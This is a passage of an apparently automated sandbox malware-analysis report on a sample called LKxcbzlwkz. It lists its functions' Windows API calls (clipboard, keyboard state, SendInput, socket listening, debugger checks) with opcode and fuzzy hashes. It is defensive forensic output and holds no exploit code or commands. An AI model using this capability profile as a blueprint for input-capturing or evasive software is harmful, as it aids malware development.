                                                                                                                                                                                                                                                            • SetUserObjectSecurity.USER32(?,00000004,?), ref: 004462D8
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.2999784282.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999765833.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999858013.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999890900.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999913081.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999934554.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999934554.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999999187.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999999187.00000000004ED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_LKxcbzlwkz.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: Security$DescriptorLengthObjectUser$Dacl$CopyErrorInformationInitializeLast
                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                            • API String ID: 1255039815-0
                                                                                                                                                                                                                                                            • Opcode ID: cf498e736c0040d611dc61921388a4e783ba54ad69564fff20abd6321b712b19
                                                                                                                                                                                                                                                            • Instruction ID: cbecfdc94e872455e881353a2ef69e95113e06a92746e25f2a634f38edc45108
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: cf498e736c0040d611dc61921388a4e783ba54ad69564fff20abd6321b712b19
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: C251BC71A00209BBEB10EFA1CD84EEFB778BF49704F01855EF515A7241D6B8DA05CB69
                                                                                                                                                                                                                                                            Function 0043305F Relevance: 16.6, APIs: 11, Instructions: 122COMMON
                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                            • __swprintf.LIBCMT ref: 00433073
                                                                                                                                                                                                                                                            • __swprintf.LIBCMT ref: 00433085
                                                                                                                                                                                                                                                            • __wcsicoll.LIBCMT ref: 00433092
                                                                                                                                                                                                                                                            • FindResourceW.KERNEL32(?,?,0000000E), ref: 004330A5
                                                                                                                                                                                                                                                            • LoadResource.KERNEL32(?,00000000), ref: 004330BD
                                                                                                                                                                                                                                                            • LockResource.KERNEL32(00000000), ref: 004330CA
                                                                                                                                                                                                                                                            • FindResourceW.KERNEL32(?,?,00000003), ref: 004330F7
                                                                                                                                                                                                                                                            • LoadResource.KERNEL32(?,00000000), ref: 00433105
                                                                                                                                                                                                                                                            • SizeofResource.KERNEL32(?,00000000), ref: 00433114
                                                                                                                                                                                                                                                            • LockResource.KERNEL32(?), ref: 00433120
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.2999784282.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999765833.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999858013.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999890900.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999913081.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999934554.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999934554.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999999187.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999999187.00000000004ED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_LKxcbzlwkz.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: Resource$FindLoadLock__swprintf$Sizeof__wcsicoll
                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                            • API String ID: 1158019794-0
                                                                                                                                                                                                                                                            • Opcode ID: b140e135c5f727b40d296f2f4b3108eaeb1a217ee9fa6a28346dce69b8385e70
                                                                                                                                                                                                                                                            • Instruction ID: 48d2d5a3af9b637b7fc6f2c6b5a7fdd3517197a5f8dc2ef3994740021b7ed835
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: b140e135c5f727b40d296f2f4b3108eaeb1a217ee9fa6a28346dce69b8385e70
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: C741F1322002146BDB10EF65EC84FAB37ADEB89321F00846BFD01C6245E779DA51C7A8
                                                                                                                                                                                                                                                            Function 0045A10F Relevance: 16.6, APIs: 11, Instructions: 120clipboardmemoryCOMMON
                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.2999784282.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999765833.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999858013.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999890900.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999913081.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999934554.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999934554.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999999187.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999999187.00000000004ED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_LKxcbzlwkz.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: Clipboard$AllocCloseEmptyGlobalOpen
                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                            • API String ID: 1737998785-0
                                                                                                                                                                                                                                                            • Opcode ID: bc1c5a0e04e7211697dd638385d424d337038878635646daacac479226a8eb74
                                                                                                                                                                                                                                                            • Instruction ID: d84b136cee2c902db59abfe4f82a3f409d39725fe24efd6a62fd8a04edebb5dd
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: bc1c5a0e04e7211697dd638385d424d337038878635646daacac479226a8eb74
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 334114726001119FC310EFA5EC89B5EB7A4FF54315F00856EF909EB3A1EB75A941CB88
                                                                                                                                                                                                                                                            Function 0045D619 Relevance: 15.9, APIs: 4, Strings: 5, Instructions: 107COMMON
                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                            • SetErrorMode.KERNEL32(00000001), ref: 0045D627
                                                                                                                                                                                                                                                            • GetDiskFreeSpaceW.KERNEL32(?,?,?,?,?,?), ref: 0045D6B5
                                                                                                                                                                                                                                                            • GetLastError.KERNEL32 ref: 0045D6BF
                                                                                                                                                                                                                                                            • SetErrorMode.KERNEL32(00000000,?), ref: 0045D751
                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.2999784282.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999765833.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999858013.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999890900.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999913081.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999934554.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999934554.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999999187.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999999187.00000000004ED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_LKxcbzlwkz.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: Error$Mode$DiskFreeLastSpace
                                                                                                                                                                                                                                                            • String ID: INVALID$NOTREADY$READONLY$READY$UNKNOWN
                                                                                                                                                                                                                                                            • API String ID: 4194297153-14809454
                                                                                                                                                                                                                                                            • Opcode ID: 7585e308607772b0055f7746bf91c511cc03d2319b95ee688ecb5d1da683c46d
                                                                                                                                                                                                                                                            • Instruction ID: 1f300c266cb1daf6abeae651b696e439ee3a0372042695327ab67fb83666ce96
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 7585e308607772b0055f7746bf91c511cc03d2319b95ee688ecb5d1da683c46d
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: FE418235D00209DFCB10EFA5C884A9DB7B4FF48315F10846BE905AB352D7799A85CB69
                                                                                                                                                                                                                                                            Function 0044EB59 Relevance: 12.9, APIs: 3, Strings: 4, Instructions: 645COMMON
                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.2999784282.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999765833.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999858013.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999890900.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999913081.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999934554.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999934554.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999999187.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999999187.00000000004ED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_LKxcbzlwkz.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: _memmove$_strncmp
                                                                                                                                                                                                                                                            • String ID: @oH$\$^$h
                                                                                                                                                                                                                                                            • API String ID: 2175499884-3701065813
                                                                                                                                                                                                                                                            • Opcode ID: f002cf83b61508de9c211a0f0d172e3a132fb63b457bb46fdb7389c8079d7204
                                                                                                                                                                                                                                                            • Instruction ID: d0725f23cfd3ca281eac06f76a82abe5967bc3f30214560d9089fed7748fa16d
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: f002cf83b61508de9c211a0f0d172e3a132fb63b457bb46fdb7389c8079d7204
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: C642E270E04249CFEB14CF69C8806AEBBF2FF85304F2481AAD855AB351D7399946CF55
                                                                                                                                                                                                                                                            Function 004652BE Relevance: 12.1, APIs: 8, Instructions: 97networkCOMMON
                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                            • socket.WSOCK32(00000002,00000001,00000006,00000000), ref: 0046530D
                                                                                                                                                                                                                                                            • WSAGetLastError.WSOCK32(00000000), ref: 0046531C
                                                                                                                                                                                                                                                            • bind.WSOCK32(00000000,?,00000010), ref: 00465356
                                                                                                                                                                                                                                                            • WSAGetLastError.WSOCK32(00000000), ref: 00465363
                                                                                                                                                                                                                                                            • closesocket.WSOCK32(00000000,00000000), ref: 00465377
                                                                                                                                                                                                                                                            • listen.WSOCK32(00000000,00000005), ref: 00465381
                                                                                                                                                                                                                                                            • WSAGetLastError.WSOCK32(00000000), ref: 004653A9
                                                                                                                                                                                                                                                            • closesocket.WSOCK32(00000000,00000000), ref: 004653BD
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.2999784282.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999765833.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999858013.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999890900.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999913081.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999934554.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999934554.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999999187.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999999187.00000000004ED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_LKxcbzlwkz.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: ErrorLast$closesocket$bindlistensocket
                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                            • API String ID: 540024437-0
                                                                                                                                                                                                                                                            • Opcode ID: 56b395d1b7441155ee1d78469f99a9871a9e2360f64803e3ab449944eb02724f
                                                                                                                                                                                                                                                            • Instruction ID: 689f190a2b8ca197395c4559ba4ec64c13dad074e2778b61c05f6be918bdb8b0
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 56b395d1b7441155ee1d78469f99a9871a9e2360f64803e3ab449944eb02724f
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: A8319331200500ABD310EF25DD89B6EB7A8EF44725F10866EF855E73D1DBB4AC818B99
                                                                                                                                                                                                                                                            Function 0044663B Relevance: 11.4, APIs: 1, Strings: 5, Instructions: 895COMMON
                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.2999784282.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999765833.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999858013.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999890900.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999913081.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999934554.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999934554.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999999187.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999999187.00000000004ED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_LKxcbzlwkz.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                                            • String ID: ERCP$VUUU$VUUU$VUUU$XjH
                                                                                                                                                                                                                                                            • API String ID: 0-2872873767
                                                                                                                                                                                                                                                            • Opcode ID: 34fecdbc504fccc055e136d4951117c2a740426f4eee1b738e863fbded63ce7f
                                                                                                                                                                                                                                                            • Instruction ID: d175e7d0ae6fb3d700f9da8fb6b70819649eb02c4ceaf458d011f7582104736e
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 34fecdbc504fccc055e136d4951117c2a740426f4eee1b738e863fbded63ce7f
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: D772D871A042198BEF24CF58C8807AEB7F1EB42314F25829BD859A7380D7799DC5CF5A
                                                                                                                                                                                                                                                            Function 00452492 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 128filesleepCOMMON
                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                              • Part of subcall function 00401B10: _wcslen.LIBCMT ref: 00401B11
                                                                                                                                                                                                                                                              • Part of subcall function 00401B10: _memmove.LIBCMT ref: 00401B57
                                                                                                                                                                                                                                                            • FindFirstFileW.KERNEL32(?,?), ref: 004524DF
                                                                                                                                                                                                                                                            • Sleep.KERNEL32(0000000A), ref: 0045250B
                                                                                                                                                                                                                                                            • FindNextFileW.KERNEL32(?,?), ref: 004525E9
                                                                                                                                                                                                                                                            • FindClose.KERNEL32(?), ref: 004525FF
                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.2999784282.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999765833.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999858013.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999890900.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999913081.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999934554.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999934554.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999999187.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999999187.00000000004ED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_LKxcbzlwkz.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: Find$File$CloseFirstNextSleep_memmove_wcslen
                                                                                                                                                                                                                                                            • String ID: *.*$\VH
                                                                                                                                                                                                                                                            • API String ID: 2786137511-2657498754
                                                                                                                                                                                                                                                            • Opcode ID: 952b61541a12346a9a2631e93aef0720ba9757898c7ad2f9180af277910d7a38
                                                                                                                                                                                                                                                            • Instruction ID: de376bcde865418ddd8e10142a6165d1fec8b8ecf5afc9fd422e88b207ce0255
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 952b61541a12346a9a2631e93aef0720ba9757898c7ad2f9180af277910d7a38
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 37417F7190021DABDB14DF64CD58AEE77B4AF49305F14445BEC09A3281E678EE49CB98
                                                                                                                                                                                                                                                            Function 0041A208 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 58COMMONLIBRARYCODE
                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                            • IsDebuggerPresent.KERNEL32 ref: 00421FC1
                                                                                                                                                                                                                                                            • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 00421FD6
                                                                                                                                                                                                                                                            • UnhandledExceptionFilter.KERNEL32(pqI), ref: 00421FE1
                                                                                                                                                                                                                                                            • GetCurrentProcess.KERNEL32(C0000409), ref: 00421FFD
                                                                                                                                                                                                                                                            • TerminateProcess.KERNEL32(00000000), ref: 00422004
                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.2999784282.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999765833.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999858013.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999890900.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999913081.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999934554.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999934554.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999999187.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999999187.00000000004ED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_LKxcbzlwkz.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: ExceptionFilterProcessUnhandled$CurrentDebuggerPresentTerminate
                                                                                                                                                                                                                                                            • String ID: pqI
                                                                                                                                                                                                                                                            • API String ID: 2579439406-2459173057
                                                                                                                                                                                                                                                            • Opcode ID: 25dc777f16e4295b66819c01749bb17431433dcbcd396824bac5e12fb106518c
                                                                                                                                                                                                                                                            • Instruction ID: 2caf929301e55fbdfba35cdc3931bb3174c20cf3198a7c5bb5494214f042e870
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 25dc777f16e4295b66819c01749bb17431433dcbcd396824bac5e12fb106518c
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 9E21CDB45392059FCB50DF65FE456483BA4BB68304F5005BBF90987371E7B969818F0D
                                                                                                                                                                                                                                                            Function 0043333C Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 40COMMON
                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                            • __wcsicoll.LIBCMT ref: 00433349
                                                                                                                                                                                                                                                            • mouse_event.USER32(00000800,00000000,00000000,00000078,00000000), ref: 0043335F
                                                                                                                                                                                                                                                            • __wcsicoll.LIBCMT ref: 00433375
                                                                                                                                                                                                                                                            • mouse_event.USER32(00000800,00000000,00000000,00000088,00000000), ref: 0043338B
                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.2999784282.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999765833.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999858013.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999890900.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999913081.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999934554.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999934554.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999999187.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999999187.00000000004ED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_LKxcbzlwkz.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: __wcsicollmouse_event
                                                                                                                                                                                                                                                            • String ID: DOWN
                                                                                                                                                                                                                                                            • API String ID: 1033544147-711622031
                                                                                                                                                                                                                                                            • Opcode ID: 3af7a305a716ba131119f47d61043d9bc75f7fbd5de0530911e4e2de0579c383
                                                                                                                                                                                                                                                            • Instruction ID: c5effa3e7e2998e6ee15a8e10ce6e2e5d36a5fc043d4170c53cc9f091e4fe068
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 3af7a305a716ba131119f47d61043d9bc75f7fbd5de0530911e4e2de0579c383
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 78F0A0726846103AF80026947C02EFB334C9B26767F004023FE0CD1280EA59290557BD
                                                                                                                                                                                                                                                            Function 0044C37A Relevance: 7.6, APIs: 5, Instructions: 145windowkeyboardCOMMON
                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                            • GetKeyboardState.USER32(?), ref: 0044C3D2
                                                                                                                                                                                                                                                            • SetKeyboardState.USER32(00000080), ref: 0044C3F6
                                                                                                                                                                                                                                                            • PostMessageW.USER32(00000000,00000101,?,?), ref: 0044C43A
                                                                                                                                                                                                                                                            • PostMessageW.USER32(00000000,00000105,?,?), ref: 0044C472
                                                                                                                                                                                                                                                            • SendInput.USER32(00000001,?,0000001C), ref: 0044C4FF
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.2999784282.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999765833.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999858013.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999890900.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999913081.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999934554.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999934554.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
